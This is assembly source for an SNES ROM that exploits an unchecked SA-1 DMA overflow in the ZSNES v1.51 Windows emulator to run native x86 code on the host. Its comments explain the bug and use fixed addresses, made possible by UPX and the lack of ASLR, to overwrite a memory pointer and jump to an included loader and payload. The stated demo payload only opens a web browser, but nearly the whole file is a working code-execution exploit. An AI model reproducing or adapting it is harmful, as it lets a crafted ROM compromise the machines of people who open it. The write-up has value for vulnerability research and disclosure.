;This is an older version. It uses another exploit mechanism that doesn't work on FuSoYa's ZSNES,
; but which is a lot easier to create.

;This ROM, when run in ZSNES v1.51 (official Windows build), will open a web browser on the ZMZ
; download page.
;Thanks to Vitor Vilela for showing me a crashy ROM (I've seen a lot of them, but never managed to
; get my hands on one), and for helpfulness with various SA-1 things.

;The bug is as follows:
;ZSNES does not range check SA-1 DMA, but instead allows them to overflow.
;The critical location is src/chips/sa1regs.asm, executesa1dma:. Using that bug, I can write up to
; 64KB after BW-RAM or I-RAM.

;BW-RAM is 4MB after the ROM. There's nothing interesting nearby, and 64KB isn't enough to overflow
; the allocation (it's about 6MB). Exploiting a heap buffer overflow is also OS dependent.

;However, I-RAM is in a more favorable location; it's a global variable.
;And not only that - right after I-RAM comes a very valuable variable, namely the pointer to BW-RAM!
;Overwriting that allows me to make ZSNES think BW-RAM is whereever I want, allowing me to fiddle
; with one of the opcode dispatch tables. ZSNES doesn't use ASLR, so its location is known.
;Or I can do it the easy way - ZSNES is UPXed, and UPX marks the entire file executable. It's not
; ASLRed either. I can just point to right after the SA-1 DMA loop; I won't even need to worry about
; the instruction cache, x86 automatically invalidates that. Instant victory.
;I'm surprised it has remained hidden for so long.

;The .S files should be assembled with 'nasm filename.S'. A pre-assembled version is included.

org $008000
CPUStart:
CLC
XCE
REP #$FF
LDA #$2200
TCD
SEP #$10

;Step 1 - overwrite SA1RAMArea with a pointer I want to scribble to
;Mode (no conversion, to I-RAM, from ROM)
LDY #%11101000;the 1s are unused by zsnes
STY $30
;Source
LDA.w #.First
STA $32
STZ $34;this hits $2235 too; it does no harm, it's overwritten later
;Size
LDA.w #.First_End-.First
STA $38
;Target offset
LDA #$07FF
STA $35

;Mode (no conversion, to BW-RAM, from ROM)
LDY #%11101100
STY $30
;Source
LDA.w #.Second
STA $32
;not storing to $35, it was done last time
;Size
LDA.w #.Second_End-.Second
STA $38
;Target offset (not clearing the low byte -> offset is $FF, we subtract that from the pointer)
STZ $36

- BRA -

.First:
db 0             ; first byte in I-RAM
db 0             ; I-RAM is 2049 bytes for whatever reason
dd $0AB5         ; PHnum2writesa1reg; seems to only be used for savestates. It's a constant, this is the original value.
dd $0062E2B5-$FF ; SA1RAMArea; the pointer I want to write to. (Luckily, both 65816 and x86 are little endian.)
..End            ; $0062E2B5 is right after the SA-1 DMA loop.
                 ; $FF is subtracted because it's writing to offset [$2235] from the above pointer,
                 ; and I don't clear the low byte of the last transfer.

.Second:
;This one is short and simple; it just loads payload.bin to an unused part of ZSNES (0x006C7D17) and jumps to it.
incbin loader
..End

; payload.S holds dependencies on this one being exactly 19 bytes
; if it's not, the restore code must be changed
your_loader_binary_has_wrong_length = 0
fillbyte 1/cos(.Second+19-..End)+your_loader_binary_has_wrong_length


dd .Payload_End-.Payload
.Payload:
incbin payload
..End

warnpc $00FFC0


org $00FFC0
db "ZSNES SUCKS          ";name
db $23;lorom, SA-1
db $35;contains SA-1
db $0A;32 banks
db $00;no sram
db $00;ntsc
db $00;licencee
db $00;version
dw $0000,$FFFF;checksum + complement
db $00,$00,$00,$00;unknown stuff
dw $FFFF,$FFFF,$FFFF;cop, brk, abort(?)
dw $FFFF,$FFFF,$FFFF;nmi, unused, irq
db $00,$00,$00,$00;unknown
dw $FFFF,$FFFF,$FFFF;(emulation) cop, unused, abort
dw $FFFF,CPUStart,$FFFF;(emulation) nmi, reset, irq/brk
